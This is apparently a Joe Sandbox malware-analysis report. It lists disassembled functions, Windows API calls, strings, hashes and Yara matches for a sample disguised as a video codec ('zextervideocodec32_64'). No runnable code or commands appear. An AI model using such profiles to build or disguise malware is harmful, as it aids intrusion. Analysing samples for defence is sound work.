                                                                                                      • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                      • String ID: bad allocation
                                                                                                      • API String ID: 3074076210-2104205924
                                                                                                      • Opcode ID: adc30761eee1b9f988c47acb1072f7fd940e6bedd3ff5d64096d6db6e05f8906
                                                                                                      • Instruction ID: 16f09aedd8cce784b87d198af6ba4d4f551e97fcad209423b3402fe998542b3f
                                                                                                      • Opcode Fuzzy Hash: adc30761eee1b9f988c47acb1072f7fd940e6bedd3ff5d64096d6db6e05f8906
                                                                                                      • Instruction Fuzzy Hash: 15E0657190020EA7DF04FE54DC059EFBBBAAB00304F4045E5ED15A6592FB719A45CEE1
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BC37B6
                                                                                                      • __localtime64.LIBCMT ref: 02BC37C1
                                                                                                        • Part of subcall function 02BD25E0: __gmtime64_s.LIBCMT ref: 02BD25F3
                                                                                                      • std::exception::exception.LIBCMT ref: 02BC37D9
                                                                                                        • Part of subcall function 02BD24B3: std::exception::_Copy_str.LIBCMT ref: 02BD24CC
                                                                                                        • Part of subcall function 02BCA4FE: __EH_prolog.LIBCMT ref: 02BCA503
                                                                                                        • Part of subcall function 02BCA4FE: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02BCA512
                                                                                                        • Part of subcall function 02BCA4FE: __CxxThrowException@8.LIBCMT ref: 02BCA531
                                                                                                      Strings
                                                                                                      • could not convert calendar time to UTC time, xrefs: 02BC37CE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
                                                                                                      • String ID: could not convert calendar time to UTC time
                                                                                                      • API String ID: 1963798777-2088861013
                                                                                                      • Opcode ID: c06b1d172bc190811da965a4d6811b57394a451131698e2417bcd28ac8f913b8
                                                                                                      • Instruction ID: 408f361aee19042865537691ed4821a34b42bac651cecf8ec32d46123156859c
                                                                                                      • Opcode Fuzzy Hash: c06b1d172bc190811da965a4d6811b57394a451131698e2417bcd28ac8f913b8
                                                                                                      • Instruction Fuzzy Hash: 77E06DB2D0020A9BCF10EFA4D915BEEB779FB04304F5085DADC12A2641EB7956058F84
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,00402E6A), ref: 0040315F
                                                                                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0040316F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                      • API String ID: 1646373207-3105848591
                                                                                                      • Opcode ID: ee4fb49231880130fc7adb82ded6e302562b2849836945389797dfa68bab57f4
                                                                                                      • Instruction ID: 396ae008ee37b43aaac66eedf252cb0d6854bca9fd0baad0eaa83bc1c4717f20
                                                                                                      • Opcode Fuzzy Hash: ee4fb49231880130fc7adb82ded6e302562b2849836945389797dfa68bab57f4
                                                                                                      • Instruction Fuzzy Hash: 14C01270380B00A6EA201FB20F0AB2628AC1B48B03F1800BEA289F81C0CE7CC600843D
                                                                                                      APIs
                                                                                                      • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,0040403A), ref: 00404C3D
                                                                                                      • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,0040403A), ref: 00404C61
                                                                                                      • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,0040403A), ref: 00404C7B
                                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,0040403A), ref: 00404D3C
                                                                                                      • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,0040403A), ref: 00404D53
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual$FreeHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 714016831-0
                                                                                                      • Opcode ID: 5cad5202a8731f25dba6dd4aaf0d633060e84280589fe69eb585605416c69a03
                                                                                                      • Instruction ID: 583ec5426b209604bff2a02b3d2478297b9ba55a468d27544d52312baf66a8bd
                                                                                                      • Opcode Fuzzy Hash: 5cad5202a8731f25dba6dd4aaf0d633060e84280589fe69eb585605416c69a03
                                                                                                      • Instruction Fuzzy Hash: BC31E2B15417019BE3348F24EE44B22B7A0EBC8754F11863AE665B73E1EB78A844CB5C
                                                                                                      APIs
                                                                                                      • VirtualFree.KERNEL32(?,00008000,00004000,7591DFF0,?,00000000), ref: 00404696
                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 004046F1
                                                                                                      • HeapFree.KERNEL32(00000000,?), ref: 00404703
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Free$Virtual$Heap
                                                                                                      • String ID: 4/@
                                                                                                      • API String ID: 2016334554-3101945251
                                                                                                      • Opcode ID: 3ffb46cc47d32c3f8fdb2cc0b40f733643667e7721e671ee35378e11fae462b1
                                                                                                      • Instruction ID: 876bcf6037267374920b0e9be09a40bf20dde446c7cba65ee9efa19dd1b870bf
                                                                                                      • Opcode Fuzzy Hash: 3ffb46cc47d32c3f8fdb2cc0b40f733643667e7721e671ee35378e11fae462b1
                                                                                                      • Instruction Fuzzy Hash: 4AB18EB4A01205DFDB14CF44CAD0A69BBA1FB88314F25C1AEDA596F3A2D735ED41CB84
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AdjustPointer_memmove
                                                                                                      • String ID:
                                                                                                      • API String ID: 1721217611-0
                                                                                                      • Opcode ID: e1ec462f8f033f190c974fbc3ecb50856aa62cece8a81ce4f2cd8e1762940242
                                                                                                      • Instruction ID: 7f358e5461e14437812d11ba1c6c2a3c5f639988eef1c91520d087c1bcc3c783
                                                                                                      • Opcode Fuzzy Hash: e1ec462f8f033f190c974fbc3ecb50856aa62cece8a81ce4f2cd8e1762940242
                                                                                                      • Instruction Fuzzy Hash: 8E4163752543035AEF299E25E841BFA3BE5DF01B68F28409EE946861D2FB75E580CF10
                                                                                                      APIs
                                                                                                      • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02BC4149), ref: 02BD139F
                                                                                                        • Part of subcall function 02BC3FDC: __EH_prolog.LIBCMT ref: 02BC3FE1
                                                                                                        • Part of subcall function 02BC3FDC: CreateEventA.KERNEL32(00000000,?,?,00000000), ref: 02BC3FF3
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 02BD1394
                                                                                                      • CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,02BC4149), ref: 02BD13E0
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02BC4149), ref: 02BD14B1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandle$Event$CreateH_prolog
                                                                                                      • String ID:
                                                                                                      • API String ID: 2825413587-0
                                                                                                      • Opcode ID: 611199129250b833dac197de790cdc28ab174846c99aa9544188ad92a1cba235
                                                                                                      • Instruction ID: 7b1b33e1deae015e5d3a5283803aec891075775d87d7cc08ed4b3508fd5237d5
                                                                                                      • Opcode Fuzzy Hash: 611199129250b833dac197de790cdc28ab174846c99aa9544188ad92a1cba235
                                                                                                      • Instruction Fuzzy Hash: 0E51D1B16007059BDF11DF28C8847DA77E4EF48328F1986A8F86D97290E735E805CF91
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                      • String ID:
                                                                                                      • API String ID: 2782032738-0
                                                                                                      • Opcode ID: 41e168db359cd1c9f07d59c3f71d26477c26a2a79f102e3ff21314e00bb1a24e
                                                                                                      • Instruction ID: 92484beb8973157d9db574d0b0fbfe36cbcaf803be124a5531f849c94ea2d951
                                                                                                      • Opcode Fuzzy Hash: 41e168db359cd1c9f07d59c3f71d26477c26a2a79f102e3ff21314e00bb1a24e
                                                                                                      • Instruction Fuzzy Hash: 3F41C475B00A06AFDB189EA9C8909EE77E6EF40364B1481FDE409C7281F772E9418F52
                                                                                                      APIs
                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02BDFF2B
                                                                                                      • __isleadbyte_l.LIBCMT ref: 02BDFF59
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,00000108,?,00000000,00000000), ref: 02BDFF87
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,00000108,00000001,00000000,00000000), ref: 02BDFFBD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                      • String ID:
                                                                                                      • API String ID: 3058430110-0
                                                                                                      • Opcode ID: 784c4c26a0dbe00eaf8b22f07f2f59127ee1e1aa6033944eda7fa483f41a47ca
                                                                                                      • Instruction ID: 20355d142ffbb1bd7b921e1b4e573a96658dc7c63c09b780c9739049d820a19c
                                                                                                      • Opcode Fuzzy Hash: 784c4c26a0dbe00eaf8b22f07f2f59127ee1e1aa6033944eda7fa483f41a47ca
                                                                                                      • Instruction Fuzzy Hash: 7D31B031609286AFDB218E75CC44BFA7BAAFF42314F1544A9F86687590F730D851DB90
                                                                                                      APIs
                                                                                                      • htons.WS2_32(?), ref: 02BC3DA2
                                                                                                        • Part of subcall function 02BC3BD3: __EH_prolog.LIBCMT ref: 02BC3BD8
                                                                                                        • Part of subcall function 02BC3BD3: std::bad_exception::bad_exception.LIBCMT ref: 02BC3BED
                                                                                                      • htonl.WS2_32(00000000), ref: 02BC3DB9
                                                                                                      • htonl.WS2_32(00000000), ref: 02BC3DC0
                                                                                                      • htons.WS2_32(?), ref: 02BC3DD4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
                                                                                                      • String ID:
                                                                                                      • API String ID: 3882411702-0
                                                                                                      APIs
                                                                                                      • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000), ref: 02BC23D0
                                                                                                      • RtlEnterCriticalSection.NTDLL(?), ref: 02BC23DE
                                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 02BC2401
                                                                                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 02BC2408
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                                                      • String ID:
                                                                                                      • API String ID: 4018804020-0
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                      • String ID:
                                                                                                      • API String ID: 3016257755-0
                                                                                                      APIs
                                                                                                      • ___BuildCatchObject.LIBCMT ref: 02BDBD24
                                                                                                        • Part of subcall function 02BDC33B: ___AdjustPointer.LIBCMT ref: 02BDC384
                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 02BDBD3B
                                                                                                      • ___FrameUnwindToState.LIBCMT ref: 02BDBD4D
                                                                                                      • CallCatchBlock.LIBCMT ref: 02BDBD71
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                      • String ID:
                                                                                                      • API String ID: 2633735394-0
                                                                                                      APIs
                                                                                                      • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02BC24A9
                                                                                                      • RtlEnterCriticalSection.NTDLL(?), ref: 02BC24B8
                                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 02BC24CD
                                                                                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 02BC24D4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                                                      • String ID:
                                                                                                      • API String ID: 4018804020-0
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BC2009
                                                                                                      • RtlDeleteCriticalSection.NTDLL(?), ref: 02BC2028
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 02BC2037
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 02BC204E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandle$CriticalDeleteH_prologSection
                                                                                                      • String ID:
                                                                                                      • API String ID: 2456309408-0
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Event$H_prologSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1765829285-0
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog_memmove
                                                                                                      • String ID: &'
                                                                                                      • API String ID: 3529519853-655172784
                                                                                                      APIs
                                                                                                      • GetCPInfo.KERNEL32(?,00000000), ref: 00406043
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Info
                                                                                                      • String ID: $
                                                                                                      • API String ID: 1807457897-3032137957
                                                                                                      APIs
                                                                                                      • _malloc.LIBCMT ref: 02BC535D
                                                                                                        • Part of subcall function 02BD2F8C: __FF_MSGBANNER.LIBCMT ref: 02BD2FA3
                                                                                                        • Part of subcall function 02BD2F8C: __NMSG_WRITE.LIBCMT ref: 02BD2FAA
                                                                                                        • Part of subcall function 02BD2F8C: RtlAllocateHeap.NTDLL(007C0000,00000000,00000001), ref: 02BD2FCF
                                                                                                      • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000), ref: 02BC536F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AllocateFolderHeapPathSpecial_malloc
                                                                                                      • String ID: \save.dat
                                                                                                      • API String ID: 4128168839-3580179773
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BC396A
                                                                                                      • std::runtime_error::runtime_error.LIBCPMT ref: 02BC39C1
                                                                                                        • Part of subcall function 02BC1410: std::exception::exception.LIBCMT ref: 02BC1428
                                                                                                        • Part of subcall function 02BCA5F4: __EH_prolog.LIBCMT ref: 02BCA5F9
                                                                                                        • Part of subcall function 02BCA5F4: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02BCA608
                                                                                                        • Part of subcall function 02BCA5F4: __CxxThrowException@8.LIBCMT ref: 02BCA627
                                                                                                      Strings
                                                                                                      • Day of month is not valid for year, xrefs: 02BC39AC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
                                                                                                      • String ID: Day of month is not valid for year
                                                                                                      • API String ID: 1404951899-1521898139
                                                                                                      APIs
                                                                                                      • std::exception::exception.LIBCMT ref: 02BCFAED
                                                                                                      • __CxxThrowException@8.LIBCMT ref: 02BCFB02
                                                                                                        • Part of subcall function 02BD3B2C: _malloc.LIBCMT ref: 02BD3B44
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                      • String ID: bad allocation
                                                                                                      • API String ID: 4063778783-2104205924
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BC3C1B
                                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 02BC3C30
                                                                                                        • Part of subcall function 02BD2497: std::exception::exception.LIBCMT ref: 02BD24A1
                                                                                                        • Part of subcall function 02BCA62D: __EH_prolog.LIBCMT ref: 02BCA632
                                                                                                        • Part of subcall function 02BCA62D: __CxxThrowException@8.LIBCMT ref: 02BCA65B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                      • String ID: bad cast
                                                                                                      • API String ID: 1300498068-3145022300
                                                                                                      • Opcode ID: e3ccb6c077789547ed5fe0d21219eff1b2c553334a993eb9b91bfbd0dffe82da
                                                                                                      • Instruction ID: c38c2f482701557d05182ef682ef97ff0ec38c2b17354294b49803e96f5e3dce
                                                                                                      • Opcode Fuzzy Hash: e3ccb6c077789547ed5fe0d21219eff1b2c553334a993eb9b91bfbd0dffe82da
                                                                                                      • Instruction Fuzzy Hash: 4EF0A0729001088BCB19EF58D450AEAB775EF51326F2041EEEE075B250DBB29A46CB90
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BC3886
                                                                                                      • std::runtime_error::runtime_error.LIBCPMT ref: 02BC38A5
                                                                                                        • Part of subcall function 02BC1410: std::exception::exception.LIBCMT ref: 02BC1428
                                                                                                        • Part of subcall function 02BC8962: _memmove.LIBCMT ref: 02BC8982
                                                                                                      Strings
                                                                                                      • Day of month value is out of range 1..31, xrefs: 02BC3894
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                                      • String ID: Day of month value is out of range 1..31
                                                                                                      • API String ID: 3258419250-1361117730
                                                                                                      • Opcode ID: 7b38d0e7182783d7a7c00f2b17b931b43daed87e6915de5d9a7c6960f02f0bc8
                                                                                                      • Instruction ID: 87ebd7953402576ab0e38a869baa13ec975467c14f8c36406bead7eeed72fa5f
                                                                                                      • Opcode Fuzzy Hash: 7b38d0e7182783d7a7c00f2b17b931b43daed87e6915de5d9a7c6960f02f0bc8
                                                                                                      • Instruction Fuzzy Hash: C1E09272A001049BDB28AB9888117DDB779EB08B10F6445CEE90377680DBF119448B91
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BC38D2
                                                                                                      • std::runtime_error::runtime_error.LIBCPMT ref: 02BC38F1
                                                                                                        • Part of subcall function 02BC1410: std::exception::exception.LIBCMT ref: 02BC1428
                                                                                                        • Part of subcall function 02BC8962: _memmove.LIBCMT ref: 02BC8982
                                                                                                      Strings
                                                                                                      • Year is out of valid range: 1400..10000, xrefs: 02BC38E0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                                      • String ID: Year is out of valid range: 1400..10000
                                                                                                      • API String ID: 3258419250-2344417016
                                                                                                      • Opcode ID: 2228cdbe5def69722a92d70a945ef011eb5ba1f955fff9a895fb27f87e91d662
                                                                                                      • Instruction ID: c0e9d0e1ca3e18e3a434861b060dd3fbff7be95e984e2acbcf3df91221a67676
                                                                                                      • Opcode Fuzzy Hash: 2228cdbe5def69722a92d70a945ef011eb5ba1f955fff9a895fb27f87e91d662
                                                                                                      • Instruction Fuzzy Hash: AFE09272A001049BDB28EB9888117DDB779EB08B10F2445CEE90373680DBF159408B91
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BC391E
                                                                                                      • std::runtime_error::runtime_error.LIBCPMT ref: 02BC393D
                                                                                                        • Part of subcall function 02BC1410: std::exception::exception.LIBCMT ref: 02BC1428
                                                                                                        • Part of subcall function 02BC8962: _memmove.LIBCMT ref: 02BC8982
                                                                                                      Strings
                                                                                                      • Month number is out of range 1..12, xrefs: 02BC392C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                                      • String ID: Month number is out of range 1..12
                                                                                                      • API String ID: 3258419250-4198407886
                                                                                                      • Opcode ID: d6e6421632794416d101f9e2b0eb47ba88ec9adda4876032d93cf60c461f8c31
                                                                                                      • Instruction ID: b4fb7c992fb558782dfd9b2dd4a197c668c1fa8e0e81e03ba399a39c4579b23e
                                                                                                      • Opcode Fuzzy Hash: d6e6421632794416d101f9e2b0eb47ba88ec9adda4876032d93cf60c461f8c31
                                                                                                      • Instruction Fuzzy Hash: B5E0D872A001049BDB28BB98C8117DEB779EB08B11F2445CEE90373680DBF119408FD5
                                                                                                      APIs
                                                                                                      • TlsAlloc.KERNEL32 ref: 02BC19CC
                                                                                                      • GetLastError.KERNEL32 ref: 02BC19D9
                                                                                                        • Part of subcall function 02BC1712: __EH_prolog.LIBCMT ref: 02BC1717
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AllocErrorH_prologLast
                                                                                                      • String ID: tss
                                                                                                      • API String ID: 249634027-1638339373
                                                                                                      • Opcode ID: be41aed44e6c75b5c93f52eebe68791251fd3f01b1c550f375d1e9981a6e4aa7
                                                                                                      • Instruction ID: 866bb61677b80b6a621b8609d9ed3304f79bddcf529bf5f34fa5939888965e2a
                                                                                                      • Opcode Fuzzy Hash: be41aed44e6c75b5c93f52eebe68791251fd3f01b1c550f375d1e9981a6e4aa7
                                                                                                      • Instruction Fuzzy Hash: 9FE04F329142109B86007A7C980808BFBA49B45270F208BAAEDBE972D1EA7049119BC2
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BC3BD8
                                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 02BC3BED
                                                                                                        • Part of subcall function 02BD2497: std::exception::exception.LIBCMT ref: 02BD24A1
                                                                                                        • Part of subcall function 02BCA62D: __EH_prolog.LIBCMT ref: 02BCA632
                                                                                                        • Part of subcall function 02BCA62D: __CxxThrowException@8.LIBCMT ref: 02BCA65B
                                                                                                      Strings
                                                                                                      Memory Dump Source
